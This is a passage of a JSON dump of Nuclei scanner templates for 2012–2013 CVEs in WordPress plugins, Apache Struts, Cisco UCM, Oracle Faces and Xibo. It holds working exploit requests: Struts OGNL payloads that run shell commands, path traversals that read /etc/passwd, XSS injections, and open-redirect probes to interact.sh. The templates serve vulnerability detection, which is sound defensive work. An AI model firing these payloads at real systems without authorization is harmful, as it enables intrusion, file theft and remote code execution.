vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-5913\n - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/\n - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html\n - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-5913\n cwe-id: CWE-79\n epss-score: 0.01863\n epss-percentile: 0.88104\n cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress_integrator_project\n product: wordpress_integrator\n tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Wordpress Integrator'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950", "hash": "3ab8dedf9d009e03549db5949b61b413", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efd" }, "name": "CVE-2012-6499.yaml", "content": "id: CVE-2012-6499\n\ninfo:\n name: WordPress Plugin Age Verification v0.4 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed.\n reference:\n - https://www.exploit-db.com/exploits/18350\n - https://wordpress.org/plugins/age-verification\n - https://nvd.nist.gov/vuln/detail/CVE-2012-6499\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-6499\n cwe-id: CWE-20\n epss-score: 0.01204\n epss-percentile: 0.83755\n cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: age_verification_project\n product: age_verification\n tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\n Host: {{Hostname}}\n\n redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950", "hash": "4c351fdc9af29e44dbf2a3d345c58d19", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efe" }, "name": "CVE-2013-1965.yaml", "content": "id: CVE-2013-1965\n\ninfo:\n name: Apache Struts2 S2-012 RCE\n author: pikpikcu\n severity: critical\n description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution on the affected server.\n remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.\n reference:\n - http://struts.apache.org/development/2.x/docs/s2-012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2013-1965\n - https://bugzilla.redhat.com/show_bug.cgi?id=967655\n - https://github.com/CrackerCat/myhktools\n - https://github.com/GhostTroops/myhktools\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2013-1965\n cwe-id: CWE-94\n epss-score: 0.00813\n epss-percentile: 0.79935\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2013,cve,apache,rce,struts,ognl\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/user.action\"\n\n body: |\n name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950", "hash": "90e4dd71d7b9f756589ff2b5ee272041", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eff" }, "name": "CVE-2013-2248.yaml", "content": "id: CVE-2013-2248\n\ninfo:\n name: Apache Struts - Multiple Open Redirection Vulnerabilities\n author: 0x_Akoko\n severity: medium\n description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.\n impact: |\n An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.\n reference:\n - https://www.exploit-db.com/exploits/38666\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2248\n - https://cwiki.apache.org/confluence/display/WW/S2-017\n - http://struts.apache.org/release/2.3.x/docs/s2-017.html\n - http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2013-2248\n cwe-id: CWE-20\n epss-score: 0.97268\n epss-percentile: 0.99838\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2013,cve,apache,redirect,struts,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.action?redirect:http://www.interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950", "hash": "63078bd7d4452213911fe7ea253d914b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f00" }, "name": "CVE-2013-2251.yaml", "content": "id: CVE-2013-2251\n\ninfo:\n name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\n author: exploitation,dwisiswant0,alex\n severity: critical\n description: In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.\n impact: |\n This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system.\n remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.\n reference:\n - http://struts.apache.org/release/2.3.x/docs/s2-016.html\n - https://cwiki.apache.org/confluence/display/WW/S2-016\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2251\n - http://archiva.apache.org/security.html\n - http://cxsecurity.com/issue/WLB-2014010087\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2013-2251\n cwe-id: CWE-20\n epss-score: 0.97432\n epss-percentile: 0.99936\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 9\n vendor: apache\n product: struts\n tags: cve2013,cve,rce,struts,apache,ognl,kev\n\nhttp:\n - raw:\n - |\n GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n payloads:\n params:\n - \"redirect\"\n - \"action\"\n - \"redirectAction\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: status\n status:\n - 200\n - 400\n condition: or\n# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950", "hash": "9b1ce112d72fee1fb481872a68773e4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f01" }, "name": "CVE-2013-2287.yaml", "content": "id: CVE-2013-2287\n\ninfo:\n name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2287\n - https://www.dognaedis.com/vulns/DGS-SEC-16.html\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-2287\n cwe-id: CWE-79\n epss-score: 0.00219\n epss-percentile: 0.59251\n cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberta_bramski\n product: uploader\n google-query: inurl:\"/wp-content/plugins/uploader\"\n tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Uploader'\n - \"Tags:\"\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950", "hash": "a548216683c7e1aa0f0e7d930ff8bc3d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f02" }, "name": "CVE-2013-2621.yaml", "content": "id: CVE-2013-2621\n\ninfo:\n name: Telaen => v1.3.1 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to the latest version of Telaen to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/38546\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2621\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2013-2621\n cwe-id: CWE-601\n epss-score: 0.03563\n epss-percentile: 0.90674\n cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: telaen_project\n product: telaen\n tags: cve2013,cve,telaen,redirect,telaen_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/telaen/redir.php?https://interact.sh\"\n - \"{{BaseURL}}/redir.php?https://interact.sh\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022047d42b34a035b4f67b78f16f771a7b48591281e968fc8d1650ad9b7808049305022100e564b5514038061f581a413e252920c2f837099327c21c6c6dda604704f18731:922c64590222798bb761d5b6d8e72950", "hash": "a2703a8c453821c13096b5fa9bd7b06d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f03" }, "name": "CVE-2013-3526.yaml", "content": "id: CVE-2013-3526\n\ninfo:\n name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.\"\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-3526\n - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-3526\n cwe-id: CWE-79\n epss-score: 0.00519\n epss-percentile: 0.74326\n cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wptrafficanalyzer\n product: trafficanalyzer\n google-query: inurl:\"/wp-content/plugins/trafficanalyzer\"\n tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'traffic analy'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950", "hash": "cace11599faceb07fbd915da2e8ea10c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f04" }, "name": "CVE-2013-3827.yaml", "content": "id: CVE-2013-3827\n\ninfo:\n name: Javafaces LFI\n author: Random-Robbie\n severity: medium\n description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.\n remediation: |\n Apply the latest patches and updates for the affected software to fix the LFI vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-3827\n - https://www.exploit-db.com/exploits/38802\n - https://www.oracle.com/security-alerts/cpuoct2013.html\n - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n - http://rhn.redhat.com/errata/RHSA-2014-0029.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2013-3827\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.64598\n epss-percentile: 0.97602\n cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 10\n vendor: oracle\n product: fusion_middleware\n tags: cve,cve2013,edb,lfi,javafaces,oracle\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n - \"{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF\"\n - \"{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022004ed49f715d733cebf8e45978d9acd3aca08a4092675323e59ef366cbae1bb33022100b9ecd10a07a9c0837cf0fbdc16fe4ddc9b65e3efccfe0b6fb2dc3f64fee938c0:922c64590222798bb761d5b6d8e72950", "hash": "0f4901671bfa04ef215cc7d330cbe727", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f05" }, "name": "CVE-2013-4117.yaml", "content": "id: CVE-2013-4117\n\ninfo:\n name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-4117\n - http://openwall.com/lists/oss-security/2013/07/11/11\n - http://seclists.org/bugtraq/2013/Jul/17\n - http://exploit.iedb.ir/exploits-177.html\n - http://packetstormsecurity.com/files/122259/WordPress-Category-Grid-View-Gallery-XSS.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-4117\n cwe-id: CWE-79\n epss-score: 0.01217\n epss-percentile: 0.83801\n cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: anshul_sharma\n product: category-grid-view-gallery\n google-query: inurl:\"/wp-content/plugins/category-grid-view-gallery\"\n tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Category Grid View Gallery ='\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950", "hash": "5c36958798f405d78bd86ae5767810eb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f06" }, "name": "CVE-2013-4625.yaml", "content": "id: CVE-2013-4625\n\ninfo:\n name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Upgrade to Duplicator 0.4.5 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-4625\n - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html\n - https://seclists.org/bugtraq/2013/Jul/160\n - https://www.htbridge.com/advisory/HTB23162\n - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-4625\n cwe-id: CWE-79\n epss-score: 0.01217\n epss-percentile: 0.85008\n cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cory_lamle\n product: duplicator\n google-query: inurl:\"/wp-content/plugins/duplicator\"\n tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Duplicator - WordPress Migration'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950", "hash": "b1d54e61fad853f4e7d442dba051603b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f07" }, "name": "CVE-2013-5528.yaml", "content": "id: CVE-2013-5528\n\ninfo:\n name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/40887\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3120\n - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N\n cvss-score: 4\n cve-id: CVE-2013-5528\n cwe-id: CWE-22\n epss-score: 0.00534\n epss-percentile: 0.74722\n cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: unified_communications_manager\n tags: cve2013,cve,lfi,cisco,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205aea6a3329c1b3729df1a92cdd65029eb715ca60be7942d50b43c534886443ec02207e979dcaeedb3adc3b95a9be530f5446fffa7fb00644d1f33ad2f93559634fc6:922c64590222798bb761d5b6d8e72950", "hash": "7dabb8844cf06a9bc570202822d92210", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f08" }, "name": "CVE-2013-5979.yaml", "content": "id: CVE-2013-5979\n\ninfo:\n name: Xibo 1.2.2/1.4.1 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.\n impact: |\n An attacker can read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Xibo.\n reference:\n - https://www.exploit-db.com/exploits/26955\n - https://nvd.nist.gov/vuln/detail/CVE-2013-5979\n - https://bugs.launchpad.net/xibo/+bug/1093967\n - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00\n - 